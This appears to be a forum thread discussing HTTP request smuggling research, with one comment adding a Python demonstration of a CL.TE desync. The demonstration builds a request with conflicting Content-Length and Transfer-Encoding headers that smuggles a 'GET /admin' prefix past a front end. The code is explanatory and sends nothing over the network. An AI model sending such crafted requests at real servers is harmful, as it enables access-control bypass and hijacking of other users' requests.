This is incredible and it looks like it could affect massive numbers of sites - unfortunately the article doesn't summarise the problem very well.

The vector is subtle differences in HTTP header parsing between your front end (reverse proxy, load balancer etc.) and your back end (web server).

"New Relic deployed a hotfix and diagnosed the root cause as a weakness in an F5 gateway. As far as I'm aware there's no patch available, meaning this is still a zeroday at the time of writing."

Edit: other major companies he revealed were affected were: PayPal, Trello, Redhat.
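To make the "subtle differences in header parsing" concrete, here is an added example (my own code, not from the article or from anyone in this thread) with two deliberately minimal HTTP/1.1 request parsers: one that behaves like a front end trusting only Content-Length, and one that behaves like a back end honouring Transfer-Encoding: chunked. Fed the same byte stream, they split it into different requests, which is the classic CL.TE desync. The request bytes, the host name example.test, and the /admin and /victim paths are all constructed for the example.

```python
"""
Added example: a CL.TE desync reproduced with two toy parsers.

cl_parser  - front-end style: message body length comes only from Content-Length.
te_parser  - back-end style:  Transfer-Encoding: chunked takes precedence.

Both are intentionally simplistic (no pipelining edge cases, no trailers,
no obs-fold) so the disagreement is easy to see.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple


@dataclass
class Request:
    request_line: str
    headers: Dict[str, str] = field(default_factory=dict)
    body: bytes = b""


def _parse_head(buf: bytes) -> Optional[Tuple[str, Dict[str, str], bytes]]:
    """Split off the request line and headers; None if the head is incomplete."""
    end = buf.find(b"\r\n\r\n")
    if end == -1:
        return None
    head, rest = buf[:end], buf[end + 4:]
    lines = head.split(b"\r\n")
    request_line = lines[0].decode("latin-1")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return request_line, headers, rest


def _read_chunked(rest: bytes) -> Optional[Tuple[bytes, bytes]]:
    """Consume a chunked body; returns (body, remaining bytes) or None if incomplete."""
    body = b""
    pos = 0
    while True:
        nl = rest.find(b"\r\n", pos)
        if nl == -1:
            return None
        size = int(rest[pos:nl].split(b";")[0], 16)  # chunk-size, ignore extensions
        pos = nl + 2
        if size == 0:
            # last-chunk; we assume no trailers, so the next CRLF ends the message
            if rest[pos:pos + 2] != b"\r\n":
                return None
            return body, rest[pos + 2:]
        if len(rest) < pos + size + 2:
            return None
        body += rest[pos:pos + size]
        pos += size + 2  # skip chunk data and its trailing CRLF


def cl_parser(stream: bytes) -> List[Request]:
    """Front-end style: Transfer-Encoding is ignored, Content-Length decides."""
    out: List[Request] = []
    while (head := _parse_head(stream)) is not None:
        request_line, headers, rest = head
        n = int(headers.get("content-length", "0"))
        if len(rest) < n:
            break
        out.append(Request(request_line, headers, rest[:n]))
        stream = rest[n:]
    return out


def te_parser(stream: bytes) -> List[Request]:
    """Back-end style: Transfer-Encoding: chunked wins over Content-Length."""
    out: List[Request] = []
    while (head := _parse_head(stream)) is not None:
        request_line, headers, rest = head
        if headers.get("transfer-encoding", "").lower() == "chunked":
            chunked = _read_chunked(rest)
            if chunked is None:
                break
            body, stream = chunked
        else:
            n = int(headers.get("content-length", "0"))
            if len(rest) < n:
                break
            body, stream = rest[:n], rest[n:]
        out.append(Request(request_line, headers, body))
    return out


# Constructed traffic for the example: an attacker request whose Content-Length
# covers a zero-length chunk plus a smuggled request prefix, followed on the
# same connection by an unrelated (victim) request.
SMUGGLED_PREFIX = b"GET /admin HTTP/1.1\r\nX-Ignore: "
ATTACKER_BODY = b"0\r\n\r\n" + SMUGGLED_PREFIX
ATTACKER_REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"Content-Length: %d\r\n" % len(ATTACKER_BODY)
    + b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    + ATTACKER_BODY
)
VICTIM_REQUEST = b"GET /victim HTTP/1.1\r\nHost: example.test\r\n\r\n"
STREAM = ATTACKER_REQUEST + VICTIM_REQUEST


def desync_view(stream: bytes = STREAM) -> Tuple[List[str], List[str]]:
    """Request lines as seen by each side of the same connection."""
    front = [r.request_line for r in cl_parser(stream)]
    back = [r.request_line for r in te_parser(stream)]
    return front, back


if __name__ == "__main__":
    front, back = desync_view()
    print("front end saw:", front)
    print("back end saw: ", back)
```

The front end forwards what it believes are two benign requests (POST / and GET /victim). The back end, having ended the first body at the zero-length chunk, treats the leftover prefix as the start of the next request, so the victim's request line is swallowed into an X-Ignore header and the victim is served GET /admin instead. A stream that carries only Content-Length is split identically by both parsers; the disagreement appears only when the two framing headers conflict, which is why RFC 7230 says a sender must not send both and a receiver that sees both must prefer Transfer-Encoding or reject the message.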
I've been waiting to hear more about this since the abstract was published.

What were the timelines involved here? PayPal, Trello, and others were contacted over the course of this investigation. It would be nice to know what their response times were to such a serious vulnerability.